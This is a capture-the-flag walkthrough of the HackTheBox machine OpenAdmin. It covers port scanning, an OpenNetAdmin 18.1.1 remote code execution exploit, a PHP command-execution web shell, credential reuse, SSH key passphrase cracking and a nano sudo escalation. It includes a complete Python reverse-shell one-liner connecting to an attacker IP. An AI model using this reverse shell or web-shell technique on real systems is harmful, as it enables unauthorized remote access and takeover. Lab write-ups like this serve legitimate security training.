# HackTheBox-OpenAdmin ## NMAP ```bash nmap -p- -sC -sV --min-rate 5000 IP PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VG HiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNK WaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2 tPAFPpvipRrLE= | 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS HEAD GET |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works ``` ## PORT 80 (HTTP) On the web server we only get apache default web page I tried to see if it had something in `robots.txt` but that file didn't existed So I decide to run `gobuster` to fuzz for files and directories Going to `music` we can see a html template page , there's login link which takes us to `OpenNetAdmin` page which is an application for managing IP addresses DNS , subnets and etc also it exposes the version of openetadmmin which is 18.1.1 On googling for any exploits which are there for version `18.1.1` we can see a github repo having the PoC of remote code execution https://github.com/amriunix/ona-rce We can check through poc if the target is vulnerable or not But when running the exploit it breaks So I went to `exploit-db` and try that exploit And this one worked perfectly I tried getting a reverse shell again so that I can stabilize it but it wasn't working I made a simple php file having a GET parameter named `cmd` which will be executed through `system` function which is used to execute shell commands and outputs the result , then I hosted this file using `python3` and downloaded it on target machine using `wget` Using python3 reverse shell I was able to get a proper shell ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` Here I have just tried to stabilize the shell so we can have the ability to clear terminal screen also use bash history by using up and arrow down keys We can go into `/home` directory to see how many users are there There are 2 users but we can't navigate into to folders as `www-data` doesn't have permissions to view them. We can look for any cronjobs running through `cat /etc/crontab` Nothing there, next we can look for open ports Here we can see port 3306 which is for database , we can try to view the database password and see if it works on either one of the users In `/opt/ona/www/local/config` we can see a database settings file Let's try this password on `jimmy` Perfect this worked ! But doing `sudo -l` failed the user was not allowed to use `sudo` I guess , so this user is in `internal` group maybe there's some folder we can look into So looking into `index.php` we can see it's a login page which requires username and password and there's a condition if we provide the username as `jimmy` or provide the correct password which we could just decrpyt the sha512 hash , on decrypting it is `Revealed` We can also see a php file `main.php` which is executing a shell command to read id_rsa key of `joanna` , if we try to run the php file we will get permission denied error as it's going to be executed as `jimmy` If we look at the running ports on the machine we can see a port `52846` Using `curl` we can make a request on that port and it seems this is the same page that we saw in `internal` directory so this directory is being hosted on port 52846 this means we can naviagte to `main.php` file I saved the request to `main.php` in a text file and transfered that file on my machine On using the private key , it asks for a passphrase Using `ssh2john` we can get the hash of id_rsa and crack it so we can get the passphrase Now we have escalated to the second user , on running `sudo -l` we can see have permissions to run `nano` on `/opt/priv` We can check the how to abuse `nano` from GTFOBINS https://gtfobins.github.io/gtfobins/nano/